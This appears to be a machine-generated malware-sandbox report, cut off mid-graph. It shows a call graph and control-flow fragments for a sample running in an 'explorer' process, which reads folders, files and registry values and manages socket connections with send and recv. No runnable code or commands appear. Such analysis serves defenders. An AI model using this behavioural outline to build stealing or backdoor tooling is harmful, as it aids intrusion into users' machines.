__free_lconv_num 2 API calls 3875->3876 3877 29f33e0 3876->3877 3878 29ede60 __free_lconv_num 2 API calls 3877->3878 3879 29f33ec 3878->3879 3880 29ede60 __free_lconv_num 2 API calls 3879->3880 3881 29f33f8 3880->3881 3882 29ede60 __free_lconv_num 2 API calls 3881->3882 3883 29f3404 3882->3883 3884 29ede60 __free_lconv_num 2 API calls 3883->3884 3885 29f3410 3884->3885 3886 29ede60 __free_lconv_num 2 API calls 3885->3886 3887 29f341c 3886->3887 3888 29ede60 __free_lconv_num 2 API calls 3887->3888 3889 29f3428 3888->3889 3890 29ede60 __free_lconv_num 2 API calls 3889->3890 3891 29f3434 3890->3891 3892 29ede60 __free_lconv_num 2 API calls 3891->3892 3893 29f3440 3892->3893 3894 29ede60 __free_lconv_num 2 API calls 3893->3894 3895 29f344c 3894->3895 3896 29ede60 __free_lconv_num 2 API calls 3895->3896 3897 29f3458 3896->3897 3898 29ede60 __free_lconv_num 2 API calls 3897->3898 3899 29f3464 3898->3899 3900 29ede60 __free_lconv_num 2 API calls 3899->3900 3901 29f3470 3900->3901 3902 29ede60 __free_lconv_num 2 API calls 3901->3902 3903 29f347c 3902->3903 3904 29ede60 __free_lconv_num 2 API calls 3903->3904 3905 29f3488 3904->3905 3906 29ede60 __free_lconv_num 2 API calls 3905->3906 3907 29f3494 3906->3907 3908 29ede60 __free_lconv_num 2 API calls 3907->3908 3909 29f34a0 3908->3909 3910 29ede60 __free_lconv_num 2 API calls 3909->3910 3911 29f34ac 3910->3911 3912 29ede60 __free_lconv_num 2 API calls 3911->3912 3913 29f34b8 3912->3913 3914 29ede60 __free_lconv_num 2 API calls 3913->3914 3915 29f34c4 3914->3915 3916 29ede60 __free_lconv_num 2 API calls 3915->3916 3917 29f34d0 3916->3917 3918 29ede60 __free_lconv_num 2 API calls 3917->3918 3919 29f34dc 3918->3919 3920 29ede60 __free_lconv_num 2 API calls 3919->3920 3921 29f34e8 3920->3921 3922 29ede60 __free_lconv_num 2 API calls 3921->3922 3923 29f34f4 3922->3923 3924 29ede60 __free_lconv_num 2 API calls 3923->3924 3925 29f3500 3924->3925 3926 29ede60 __free_lconv_num 2 API calls 3925->3926 3927 29f350c 3926->3927 3928 29ede60 __free_lconv_num 2 API calls 3927->3928 3929 29f3518 3928->3929 3930 29ede60 __free_lconv_num 2 API calls 3929->3930 3931 29f3524 3930->3931 3932 29ede60 __free_lconv_num 2 API calls 3931->3932 3933 29f3530 3932->3933 3934 29ede60 __free_lconv_num 2 API calls 3933->3934 3935 29f353c 3934->3935 3936 29ede60 __free_lconv_num 2 API calls 3935->3936 3937 29f3548 3936->3937 3938 29ede60 __free_lconv_num 2 API calls 3937->3938 3939 29f3554 3938->3939 3940 29ede60 __free_lconv_num 2 API calls 3939->3940 3941 29f3560 3940->3941 3942 29ede60 __free_lconv_num 2 API calls 3941->3942 3943 29f356c 3942->3943 3944 29ede60 __free_lconv_num 2 API calls 3943->3944 3945 29f3578 3944->3945 3946 29ede60 __free_lconv_num 2 API calls 3945->3946 3947 29f3584 3946->3947 3948 29ede60 __free_lconv_num 2 API calls 3947->3948 3949 29f3590 3948->3949 3950 29ede60 __free_lconv_num 2 API calls 3949->3950 3951 29f359c 3950->3951 3952 29ede60 __free_lconv_num 2 API calls 3951->3952 3953 29f35a8 3952->3953 3954 29ede60 __free_lconv_num 2 API calls 3953->3954 3955 29f35b4 3954->3955 3956 29ede60 __free_lconv_num 2 API calls 3955->3956 3956->3784 3958 29f1cd5 3957->3958 3960 29f1cda _invalid_parameter_noinfo 3957->3960 3959 29ec2d0 _errno 2 API calls 3958->3959 3959->3960 3960->3504 3962 29f1a61 3961->3962 3964 29f1a6e 3961->3964 3963 29ec2d0 _errno 2 API calls 3962->3963 3965 29f1a66 _invalid_parameter_noinfo 3963->3965 3964->3965 3966 29ec2d0 _errno 2 API calls 3964->3966 3965->3520 3966->3965 3968 29f1f2c _getbuf 2 API calls 3967->3968 3969 29f1a1d 3968->3969 3969->3510 3971 29f195f 3970->3971 3972 29f1947 3970->3972 3973 29f19d6 3971->3973 3978 29f1991 3971->3978 4014 29ec2f0 3972->4014 3975 29ec2f0 __doserrno 2 API calls 3973->3975 3977 29f19db 3975->3977 3980 29ec2d0 _errno 2 API calls 3977->3980 4017 29f4118 3978->4017 3979 29ec2d0 _errno 2 API calls 3982 29f1954 _invalid_parameter_noinfo 3979->3982 3980->3982 3982->3516 3983 29f1998 3984 29f19b5 3983->3984 3985 29f19a4 3983->3985 3987 29ec2d0 _errno 2 API calls 3984->3987 4021 29f11c4 3985->4021 3988 29f19ba 3987->3988 3990 29ec2f0 __doserrno 2 API calls 3988->3990 3989 29f19b1 4048 29f41c0 RtlLeaveCriticalSection 3989->4048 3990->3989 3993 29f1103 3992->3993 3997 29f111b 3992->3997 3994 29ec2f0 __doserrno 2 API calls 3993->3994 3996 29f1108 3994->3996 3995 29f1195 3998 29ec2f0 __doserrno 2 API calls 3995->3998 3999 29ec2d0 _errno 2 API calls 3996->3999 3997->3995 4000 29f114d 3997->4000 4001 29f119a 3998->4001 4005 29f1110 _invalid_parameter_noinfo 3999->4005 4002 29f4118 write_char 2 API calls 4000->4002 4003 29ec2d0 _errno 2 API calls 4001->4003 4004 29f1154 4002->4004 4003->4005 4006 29f1172 4004->4006 4007 29f1160 4004->4007 4005->3516 4008 29ec2d0 _errno 2 API calls 4006->4008 4009 29f1048 write_char 2 API calls 4007->4009 4010 29f1177 4008->4010 4011 29f116d 4009->4011 4012 29ec2f0 __doserrno 2 API calls 4010->4012 4075 29f41c0 RtlLeaveCriticalSection 4011->4075 4012->4011 4015 29ec574 __doserrno 2 API calls 4014->4015 4016 29ec2f9 4015->4016 4016->3979 4018 29f4159 4017->4018 4020 29f4161 write_char _lock _amsg_exit 4017->4020 4019 29f24f4 _lock 2 API calls 4018->4019 4019->4020 4020->3983 4023 29f11e6 write_char 4021->4023 4022 29f121a 4024 29ec2f0 __doserrno 2 API calls 4022->4024 4023->4022 4026 29f1280 4023->4026 4027 29f120e _invalid_parameter_noinfo malloc 4023->4027 4025 29f121f 4024->4025 4028 29ec2d0 _errno 2 API calls 4025->4028 4029 29f1295 4026->4029 4049 29f1048 4026->4049 4027->3989 4028->4027 4031 29f1a58 _isatty 2 API calls 4029->4031 4032 29f129c 4031->4032 4033 29ec5f8 _getptd 2 API calls 4032->4033 4039 29f152e write_char malloc __free_lconv_num 4032->4039 4035 29f12c0 write_char malloc 4033->4035 4034 29f18b9 4034->4027 4036 29ec2d0 _errno 2 API calls 4034->4036 4035->4039 4057 29f2298 4035->4057 4037 29f18e1 4036->4037 4040 29ec2f0 __doserrno 2 API calls 4037->4040 4038 29f185d 4041 29f18ad 4038->4041 4042 29f1862 4038->4042 4039->4027 4039->4034 4039->4038 4040->4027 4060 29ec310 4041->4060 4044 29ec2d0 _errno 2 API calls 4042->4044 4045 29f1867 4044->4045 4046 29ec2f0 __doserrno 2 API calls 4045->4046 4046->4027 4065 29f40a4 4049->4065 4051 29f1064 4052 29f106a 4051->4052 4055 29f107b write_char __free_lconv_num 4051->4055 4053 29ec2d0 _errno 2 API calls 4052->4053 4054 29f106f 4053->4054 4054->4029 4055->4054 4056 29ec310 write_char 2 API calls 4055->4056 4056->4054 4058 29ead7c write_char 2 API calls 4057->4058 4059 29f22ac 4058->4059 4059->4035 4061 29ec574 __doserrno 2 API calls 4060->4061 4062 29ec31d 4061->4062 4063 29ec574 __doserrno 2 API calls 4062->4063 4064 29ec336 __free_lconv_num 4063->4064 4064->4027 4066 29f40ad 4065->4066 4067 29f40c2 4065->4067 4068 29ec2f0 __doserrno 2 API calls 4066->4068 4070 29ec2f0 __doserrno 2 API calls 4067->4070 4074 29f40ba _invalid_parameter_noinfo 4067->4074 4069 29f40b2 4068->4069 4071 29ec2d0 _errno 2 API calls 4069->4071 4072 29f40fc 4070->4072 4071->4074 4073 29ec2d0 _errno 2 API calls 4072->4073 4073->4074 4074->4051 4094 29d2730 4076->4094 4079 29d296d 4079->3462 4079->3463 4080 29d28b5 4081 29d28da LocalAlloc 4080->4081 4082 29d290f 4081->4082 4083 29d2962 CoTaskMemFree 4081->4083 4084 29e9e0c 5 API calls 4082->4084 4083->4079 4085 29d293b 4084->4085 4086 29d2945 CoTaskMemFree 4085->4086 4086->4079 4088 29e9e0c 5 API calls 4087->4088 4089 29cbfe8 RegGetValueW 4088->4089 4090 29cc0ae 4089->4090 4091 29cc046 LocalAlloc 4089->4091 4090->3478 4090->3479 4091->4090 4092 29cc064 RegGetValueW 4091->4092 4092->4090 4093 29cc0c3 LocalFree 4092->4093 4093->4090 4095 29d2746 SHGetKnownFolderPath 4094->4095 4095->4079 4095->4080 4096 29e7d00 4128 29e7d61 4096->4128 4097 29e850f WaitForSingleObject 4111 29e7e12 4097->4111 4097->4128 4098 29e7dac WaitForSingleObject 4098->4097 4098->4128 4099 29e8172 WaitForMultipleObjects 4099->4111 4099->4128 4100 29e7dfb WaitForSingleObject 4100->4111 4100->4128 4101 29e8700 4102 29e870b shutdown closesocket 4101->4102 4103 29e8738 LocalFree 4101->4103 4102->4103 4104 29e8577 shutdown closesocket 4104->4128 4105 29e8609 shutdown closesocket 4105->4128 4106 29e8679 shutdown closesocket 4106->4111 4107 29e85cf CloseHandle 4107->4128 4108 29e86d1 CloseHandle 4108->4111 4109 29e7e3c WaitForSingleObject 4109->4128 4111->4101 4111->4106 4111->4108 4112 29e820a WaitForSingleObject 4112->4111 4114 29e8228 WaitForSingleObject 4112->4114 4113 29e7ec7 setsockopt 4115 29e813c shutdown closesocket 4113->4115 4116 29e7f12 setsockopt 4113->4116 4117 29e824b WSAEnumNetworkEvents 4114->4117 4114->4128 4115->4128 4116->4115 4116->4128 4118 29e8496 shutdown closesocket CloseHandle 4117->4118 4117->4128 4118->4128 4119 29e6620 10 API calls 4119->4128 4120 29e828f shutdown closesocket CloseHandle 4120->4128 4121 29e8315 recv 4122 29e8425 shutdown closesocket CloseHandle 4121->4122 4121->4128 4122->4128 4123 29e60d0 10 API calls 4123->4128 4126 29e83b4 shutdown closesocket CloseHandle 4126->4128 4127 29e8374 CloseHandle 4127->4128 4128->4097 4128->4098 4128->4099 4128->4100 4128->4104 4128->4105 4128->4107 4128->4109 4128->4111 4128->4112 4128->4113 4128->4115 4128->4119 4128->4120 4128->4121 4128->4123 4129 29e80ac WSACreateEvent 4128->4129 4133 29e54d0 socket 4128->4133 4188 29e3ff0 4128->4188 4129->4115 4130 29e80c5 WSAEventSelect 4129->4130 4131 29e811a CloseHandle 4130->4131 4132 29e80e5 4130->4132 4131->4115 4132->4131 4134 29e550d 4133->4134 4135 29e5514 WSAGetLastError WSACreateEvent 4133->4135 4134->4128 4136 29e552d 4135->4136 4137 29e5537 WSAEventSelect 4135->4137 4138 29e5b0c shutdown closesocket 4136->4138 4139 29e555b 4137->4139 4184 29e5551 4137->4184 4138->4134 4141 29e577e 4139->4141 4142 29e556b 4139->4142 4140 29e5b01 CloseHandle 4140->4138 4143 29e57a5 inet_addr 4141->4143 4144 29e5795 4141->4144 4145 29e5577 4142->4145 4146 29e5584 inet_addr 4142->4146 4147 29e5809 htons connect 4143->4147 4148 29e57c4 gethostbyname 4143->4148 4144->4147 4149 29e55d6 htons connect 4145->4149 4146->4149 4150 29e559d gethostbyname 4146->4150 4147->4140 4152 29e585c WSAGetLastError 4147->4152 4148->4144 4148->4184 4151 29e561a WSAGetLastError 4149->4151 4149->4184 4150->4145 4150->4184 4153 29e562b WSAWaitForMultipleEvents 4151->4153 4151->4184 4152->4140 4154 29e586d WSAWaitForMultipleEvents 4152->4154 4157 29e568c WSACloseEvent closesocket 4153->4157 4158 29e56a9 4153->4158 4159 29e58e9 4154->4159 4160 29e5900 WSACloseEvent closesocket 4154->4160 4157->4134 4161 29e56b3 WSACloseEvent closesocket 4158->4161 4162 29e56d0 4158->4162 4159->4160 4163 29e591d 4159->4163 4160->4134 4161->4134 4164 29e56d7 WSAEnumNetworkEvents 4162->4164 4165 29e5755 4162->4165 4163->4140 4167 29e592b WSAEnumNetworkEvents 4163->4167 4168 29e570d 4164->4168 4169 29e56f0 closesocket WSACloseEvent 4164->4169 4166 29e575c closesocket WSACloseEvent 4165->4166 4165->4184 4166->4134 4170 29e5947 WSACloseEvent closesocket 4167->4170 4171 29e5964 4167->4171 4172 29e5718 closesocket WSACloseEvent 4168->4172 4173 29e5735 4168->4173 4169->4134 4170->4134 4175 29e596e WSACloseEvent closesocket 4171->4175 4176 29e598b 4171->4176 4172->4134 4173->4165 4174 29e5740 WSACloseEvent 4173->4174 4174->4134 4175->4134 4177 29e5997 4176->4177 4178 29e59b2 inet_addr 4176->4178 4179 29e5a7a 4177->4179 4180 29e59f7 4177->4180 4178->4177 4179->4140 4269 29e5cd0 LocalAlloc 4179->4269 4255 29e5b40 LocalAlloc 4180->4255 4184->4140 4185 29e5a60 CloseHandle 4185->4134 4187 29e5aef CloseHandle 4187->4134 4189 29e403a 4188->4189 4190 29e44b7 4188->4190 4193 29e427d WaitForSingleObject 4189->4193 4194 29e409a 4189->4194 4222 29e422d 4189->4222 4191 29e44da setsockopt 4190->4191 4192 29e452e 4190->4192 4195 29e4518 4191->4195 4191->4222 4200 29e45ae setsockopt 4192->4200 4221 29e462e 4192->4221 4199 29e42a5 4193->4199 4196 29e40e6 4194->4196 4197 29e40b2 CloseHandle 4194->4197 4302 29c8b50 4195->4302 4201 29e40fe CloseHandle 4196->4201 4202 29e4132 CreateEventW 4196->4202 4197->4196 4204 29e42ff 4199->4204 4205 29e42cb CloseHandle 4199->4205 4199->4222 4208 29e45ec 4200->4208 4200->4222 4201->4202 4209 29e4156 CreateThread 4202->4209 4202->4222 4206 29e434b CreateEventW 4204->4206 4207 29e4317 CloseHandle 4204->4207 4205->4204 4211 29e436f CreateThread 4206->4211 4206->4222 4207->4206 4368 29e4d40 send 4208->4368 4213 29e41ac ResumeThread 4209->4213 4214 29e4222 CloseHandle 4209->4214 4210 29e4532 4335 29c96b0 4210->4335 4216 29e443b CloseHandle 4211->4216 4217 29e43c5 ResumeThread 4211->4217 4219 29e4217 CloseHandle 4213->4219 4230 29e420d 4213->4230 4214->4222 4216->4222 4223 29e4430 CloseHandle 4217->4223 4217->4230 4218 29e460f closesocket 4218->4222 4219->4214 4221->4222 4226 29e46a7 4221->4226 4231 29e46db 4221->4231 4222->4126 4222->4127 4223->4216 4224 29e454c 4367 29e4d40 send 4224->4367 4225 29e4548 4225->4192 4369 29e4af0 4226->4369 4229 29e456f closesocket 4229->4222 4230->4222 4231->4222 4232 29e4770 4231->4232 4233 29e48e1 WaitForSingleObject 4231->4233 4236 29e477f CloseHandle 4232->4236 4237 29e47a1 4232->4237 4234 29e490e 4233->4234 4235 29e4900 4233->4235 4239 29e493f 4234->4239 4240 29e491d CloseHandle 4234->4240 4235->4234 4238 29e4a7c 4235->4238 4236->4237 4241 29e47d2 CreateEventW 4237->4241 4242 29e47b0 CloseHandle 4237->4242 4238->4222 4382 29e4d40 send 4238->4382 4243 29e494e CloseHandle 4239->4243 4244 29e4970 CreateEventW 4239->4244 4240->4239 4241->4222 4245 29e47fc 4241->4245 4242->4241 4243->4244 4244->4222 4247 29e499a CreateThread 4244->4247 4252 29e489e CloseHandle 4245->4252 4253 29e4837 ResumeThread 4245->4253 4249 29e4a3c CloseHandle 4247->4249 4250 29e49d5 ResumeThread 4247->4250 4248 29e4aaf closesocket 4248->4222 4249->4222 4250->4230 4251 29e4a2e CloseHandle 4250->4251 4251->4249 4252->4222 4253->4230 4254 29e4890 CloseHandle 4253->4254 4254->4252 4256 29e5bb7 htons 4255->4256 4258 29e5a58 4255->4258 4284 29e5fb0 WSACreateEvent 4256->4284 4258->4184 4258->4185 4260 29e5cb7 LocalFree 4260->4258 4262 29e5c25 4262->4260 4292 29e5e90 WSACreateEvent 4262->4292 4266 29e5c6a 4266->4260 4267 29e5c8c und_memcpy 4266->4267 4268 29e5ca8 LocalFree 4267->4268 4268->4258 4270 29e5ae7 4269->4270 4271 29e5d49 htons 4269->4271 4270->4140 4270->4187 4272 29e5d99 4271->4272 4273 29e5fb0 5 API calls 4272->4273 4274 29e5dba 4273->4274 4275 29e5e6d LocalFree 4274->4275 4300 29e4d40 send 4274->4300 4275->4270 4277 29e5ddd 4277->4275 4278 29e5e90 5 API calls 4277->4278 4279 29e5e00 4278->4279 4279->4275 4301 29e4d00 recv 4279->4301 4281 29e5e20 4281->4275 4282 29e5e42 und_memcpy 4281->4282 4283 29e5e5e LocalFree 4282->4283 4283->4270 4285 29e5fdf WSAEventSelect 4284->4285 4286 29e5c01 4284->4286 4287 29e5ffd WSAWaitForMultipleEvents WSACloseEvent 4285->4287 4288 29e60b4 WSACloseEvent 4285->4288 4286->4260 4291 29e4d40 send 4286->4291 4287->4286 4290 29e606f 4287->4290 4288->4286 4290->4286 4290->4288 4291->4262 4293 29e5ebf WSAEventSelect 4292->4293 4298 29e5c4a 4292->4298 4294 29e5edd WSAWaitForMultipleEvents WSACloseEvent 4293->4294 4295 29e5f94 WSACloseEvent 4293->4295 4297 29e5f4f 4294->4297 4294->4298 4295->4298 4297->4295 4297->4298 4298->4260 4299 29e4d00 recv 4298->4299 4299->4266 4300->4277 4301->4281 4303 29c8b67 4302->4303 4304 29c8b6c 4303->4304 4383 29d2ab0 SHGetKnownFolderPath 4303->4383 4304->4192 4304->4210 4309 29c8bc6 LocalAlloc 4311 29c8be7 lstrcpyW StrStrIW CreateFileW 4309->4311 4315 29c9070 4309->4315 4310 29c90a1 LocalFree 4310->4304 4314 29c8c5a GetFileSize 4311->4314 4311->4315 4312 29c908e 4312->4310 4316 29c9096 LocalFree 4312->4316 4313 29c9083 LocalFree 4313->4312 4317 29c905d 4314->4317 4318 29c8c76 LocalAlloc 4314->4318 4315->4312 4315->4313 4316->4310 4317->4315 4319 29c9065 CloseHandle 4317->4319 4318->4317 4320 29c8c98 ReadFile 4318->4320 4319->4315 4321 29c8ccf CloseHandle 4320->4321 4322 29c9052 LocalFree 4320->4322 4323 29c8d36 4321->4323 4322->4317 4323->4322 4324 29c8de9 LocalAlloc 4323->4324 4329 29c8ffd 4323->4329 4325 29c8e10 LocalAlloc 4324->4325 4324->4329 4326 29c8fef LocalFree 4325->4326 4327 29c8e37 4325->4327 4326->4329 4328 29c8e51 lstrcpyW lstrcpyW lstrcpyW 4327->4328 4330 29c8efe 4328->4330 4329->4322 4331 29c903c VirtualFree 4329->4331 4332 29c8fe1 LocalFree 4330->4332 4333 29c8f58 LocalFree LocalFree LocalFree LocalFree 4330->4333 4331->4322 4332->4326 4333->4304 4336 29c96c8 4335->4336 4337 29d2ab0 5 API calls 4336->4337 4339 29c96cd 4336->4339 4338 29c96e5 4337->4338 4338->4339 4340 29c7e40 71 API calls 4338->4340 4339->4224 4339->4225 4341 29c971e 4340->4341 4342 29c9c36 LocalFree 4341->4342 4343 29c9727 LocalAlloc 4341->4343 4342->4339 4344 29c9748 lstrcpyW StrStrIW 4343->4344 4345 29c9c10 4343->4345 4348 29e9e0c 5 API calls 4344->4348 4346 29c9c18 LocalFree 4345->4346 4347 29c9c23 4345->4347 4346->4347 4347->4342 4349 29c9c2b LocalFree 4347->4349 4350 29c97a4 RegGetValueW 4348->4350 4349->4342 4351 29c9c05 LocalFree 4350->4351 4352 29c97f3 LocalAlloc 4350->4352 4351->4345 4352->4351 4353 29c983d RegGetValueW 4352->4353 4354 29c9bf7 LocalFree 4353->4354 4355 29c9885 4353->4355 4354->4351 4355->4354 4356 29c9997 LocalAlloc 4355->4356 4361 29c9ba2 4355->4361 4357 29c99be LocalAlloc 4356->4357 4356->4361 4358 29c9b94 LocalFree 4357->4358 4359 29c99e5 4357->4359 4358->4361 4360 29c99ff lstrcpyW lstrcpyW lstrcpyW 4359->4360 4364 29c9ab2 4360->4364 4361->4354 4362 29c9be1 VirtualFree 4361->4362 4362->4354 4363 29c9b86 LocalFree 4363->4358 4364->4363 4365 29c9b08 LocalFree LocalFree LocalFree 4364->4365 4365->4339 4367->4229 4368->4218 4370 29e4b29 4369->4370 4371 29e4b34 WaitForSingleObject 4370->4371 4381 29e4c67 4370->4381 4372 29e4b5a 4371->4372 4373 29e4b8d CloseHandle 4372->4373 4374 29e4ba9 4372->4374 4372->4381 4373->4374 4375 29e4bb5 CloseHandle 4374->4375 4376 29e4bd1 CreateEventW 4374->4376 4375->4376 4377 29e4bf5 4376->4377 4376->4381 4378 29e4c2a ResumeThread 4377->4378 4379 29e4c79 CloseHandle 4377->4379 4380 29e4c6e CloseHandle 4378->4380 4378->4381 4379->4381 4380->4379 4381->4230 4382->4248 4384 29d2ad9 LocalAlloc 4383->4384 4385 29c8b84 4383->4385 4386 29d2b4a CoTaskMemFree 4384->4386 4387 29d2af6 wnsprintfW 4384->4387 4385->4304 4390 29c7e40 4385->4390 4386->4385 4387->4386 4388 29d2b26 4387->4388 4389 29d2b30 CoTaskMemFree 4388->4389 4389->4385 4391 29d2ab0 5 API calls 4390->4391 4392 29c7e63 4391->4392 4393 29c7e74 LocalAlloc 4392->4393 4394 29c8861 4392->4394 4395 29c7e95 LocalAlloc 4393->4395 4396 29c8856 LocalFree 4393->4396 4394->4309 4394->4310 4397 29c884b LocalFree 4395->4397 4398 29c7eb6 4395->4398 4396->4394 4397->4396 4399 29c7ebd wnsprintfW wnsprintfW 4398->4399 4400 29c7f08 4398->4400 4401 29c881f LocalFree 4399->4401 4402 29c7f0f wnsprintfW wnsprintfW 4400->4402 4403 29c7f5a 4400->4403 4401->4394 4402->4401 4404 29c7fac 4403->4404 4405 29c7f61 wnsprintfW wnsprintfW 4403->4405 4406 29c7ffe 4404->4406 4407 29c7fb3 wnsprintfW wnsprintfW 4404->4407 4405->4401 4408 29c8005 wnsprintfW wnsprintfW 4406->4408 4409 29c8050 4406->4409 4407->4401 4408->4401 4410 29c8057 wnsprintfW wnsprintfW 4409->4410 4411 29c80a2 4409->4411 4410->4401 4412 29c80a9 wnsprintfW wnsprintfW 4411->4412 4413 29c80f4 4411->4413 4412->4401 4414 29c80fb wnsprintfW wnsprintfW 4413->4414 4415 29c8146 4413->4415 4414->4401 4416 29c814d wnsprintfW wnsprintfW 4415->4416 4417 29c8198 4415->4417 4416->4401 4418 29c819f wnsprintfW wnsprintfW 4417->4418 4419 29c81ea 4417->4419 4418->4401 4420 29c823c 4419->4420 4421 29c81f1 wnsprintfW wnsprintfW 4419->4421 4422 29c828e 4420->4422 4423 29c8243 wnsprintfW wnsprintfW 4420->4423 4421->4401 4424 29c8295 wnsprintfW wnsprintfW 4422->4424 4425 29c82e0 4422->4425 4423->4401 4424->4401 4426 29c82e7 wnsprintfW wnsprintfW 4425->4426 4427 29c8332 4425->4427 4426->4401 4428 29c8339 wnsprintfW wnsprintfW 4427->4428 4429 29c8384 4427->4429 4428->4401 4430 29c838b wnsprintfW wnsprintfW 4429->4430 4431 29c83d6 4429->4431 4430->4401 4432 29c83dd wnsprintfW wnsprintfW 4431->4432 4433 29c8428 4431->4433 4432->4401 4434 29c842f wnsprintfW wnsprintfW 4433->4434 4435 29c847a 4433->4435 4434->4401 4436 29c84cc 4435->4436 4437 29c8481 wnsprintfW wnsprintfW 4435->4437 4438 29c851e 4436->4438 4439 29c84d3 wnsprintfW wnsprintfW 4436->4439 4437->4401 4440 29c8525 wnsprintfW wnsprintfW 4438->4440 4441 29c8570 4438->4441 4439->4401 4440->4401 4442 29c8577 wnsprintfW wnsprintfW 4441->4442 4443 29c85c2 4441->4443 4442->4401 4444 29c85c9 wnsprintfW wnsprintfW 4443->4444 4445 29c8614 4443->4445 4444->4401 4446 29c861b wnsprintfW wnsprintfW 4445->4446 4447 29c8666 4445->4447 4446->4401 4448 29c866d wnsprintfW wnsprintfW 4447->4448 4449 29c86b8 4447->4449 4448->4401 4450 29c86bf wnsprintfW wnsprintfW 4449->4450 4451 29c870a 4449->4451 4450->4401 4452 29c875c 4451->4452 4453 29c8711 wnsprintfW wnsprintfW 4451->4453 4454 29c87ab 4452->4454 4455 29c8763 wnsprintfW wnsprintfW 4452->4455 4453->4401 4456 29c87fa LocalFree LocalFree LocalFree 4454->4456 4457 29c87b2 wnsprintfW wnsprintfW 4454->4457 4455->4401 4456->4394 4457->4401

                                                          Executed Functions

                                                          Function 02CFFA9D Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 399 2cffa9d-2cffad5 SleepEx 401 2cffadb 399->401 402 2cffae1-2cffaf8 399->402 401->402 403 2cffafe-2cffb10 402->403 404 2cffb12-2cffbdc 402->404 403->404
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 417af1ec0aa7b54b74b5b8374b8fdc072b161b802418c2f8413a13bbf66cffab
                                                          • Instruction ID: e6dbe40514310c99a28c32b0105b1de9f8f3877ee6257210d538726e374fb41d
                                                          • Opcode Fuzzy Hash: 417af1ec0aa7b54b74b5b8374b8fdc072b161b802418c2f8413a13bbf66cffab
                                                          • Instruction Fuzzy Hash: EE211A7BE0D1608F8784CF36D4804D977A2F288B7835F086ADA04A7F9DC6746D26CB80
                                                          Function 029E7D00 Relevance: 75.7, APIs: 40, Strings: 3, Instructions: 439synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 29e7d00-29e7d94 call 29e38f0 * 2 5 29e7d9f-29e7da6 0->5 6 29e850f-29e8524 WaitForSingleObject 5->6 7 29e7dac-29e7dc1 WaitForSingleObject 5->7 9 29e852f 6->9 10 29e8526-29e852d 6->10 7->6 8 29e7dc7-29e7dec 7->8 14 29e8172-29e8199 WaitForMultipleObjects 8->14 15 29e7df2-29e7df9 8->15 13 29e863b-29e8646 9->13 10->9 12 29e8539-29e8544 10->12 17 29e8556-29e855e 12->17 16 29e8658-29e8660 13->16 22 29e819b-29e81a3 14->22 23 29e81a5 14->23 18 29e7dfb-29e7e10 WaitForSingleObject 15->18 19 29e7e12 15->19 20 29e8666-29e8677 16->20 21 29e8700-29e8709 16->21 24 29e85fe-29e8607 17->24 25 29e8564-29e8575 17->25 18->19 32 29e7e1c-29e7e2d 18->32 19->13 33 29e86be-29e86cf 20->33 34 29e8679-29e86b2 shutdown closesocket 20->34 26 29e870b-29e872c shutdown closesocket 21->26 27 29e8738-29e874f LocalFree 21->27 22->23 35 29e81af-29e81b7 22->35 23->13 30 29e8609-29e862a shutdown closesocket 24->30 31 29e8636 24->31 28 29e85bc-29e85cd 25->28 29 29e8577-29e85b0 shutdown closesocket 25->29 26->27 36 29e85cf-29e85f0 CloseHandle 28->36 37 29e85f9 28->37 29->28 30->31 31->5 38 29e816d 32->38 39 29e7e33-29e7e3a 32->39 40 29e86fb 33->40 41 29e86d1-29e86f2 CloseHandle 33->41 34->33 42 29e81b9 35->42 43 29e81c3-29e81ca 35->43 36->37 37->17 38->14 47 29e7e3c-29e7e51 WaitForSingleObject 39->47 48 29e7e53 39->48 40->16 41->40 42->12 44 29e81cc 43->44 45 29e81d6-29e81fb 43->45 44->12 53 29e850a 45->53 54 29e8201-29e8208 45->54 47->48 51 29e7e58-29e7ec1 call 29e54d0 47->51 48->14 58 29e815d-29e8166 51->58 59 29e7ec7-29e7f0c setsockopt 51->59 53->5 56 29e821e 54->56 57 29e820a-29e821c WaitForSingleObject 54->57 56->13 57->56 60 29e8228-29e8245 WaitForSingleObject 57->60 58->38 61 29e813c-29e8157 shutdown closesocket 59->61 62 29e7f12-29e7f48 setsockopt 59->62 63 29e824b-29e827b WSAEnumNetworkEvents 60->63 64 29e8505 60->64 61->58 62->61 65 29e7f4e-29e7f95 call 29e6620 62->65 66 29e8496-29e84fc shutdown closesocket CloseHandle 63->66 67 29e8281-29e828d 63->67 64->53 65->61 74 29e7f9b-29e7fe3 call 29e60d0 65->74 66->64 69 29e828f-29e82fe shutdown closesocket CloseHandle 67->69 70 29e8303-29e830f 67->70 72 29e8494 69->72 70->72 73 29e8315-29e834d recv 70->73 72->64 75 29e8425-29e848b 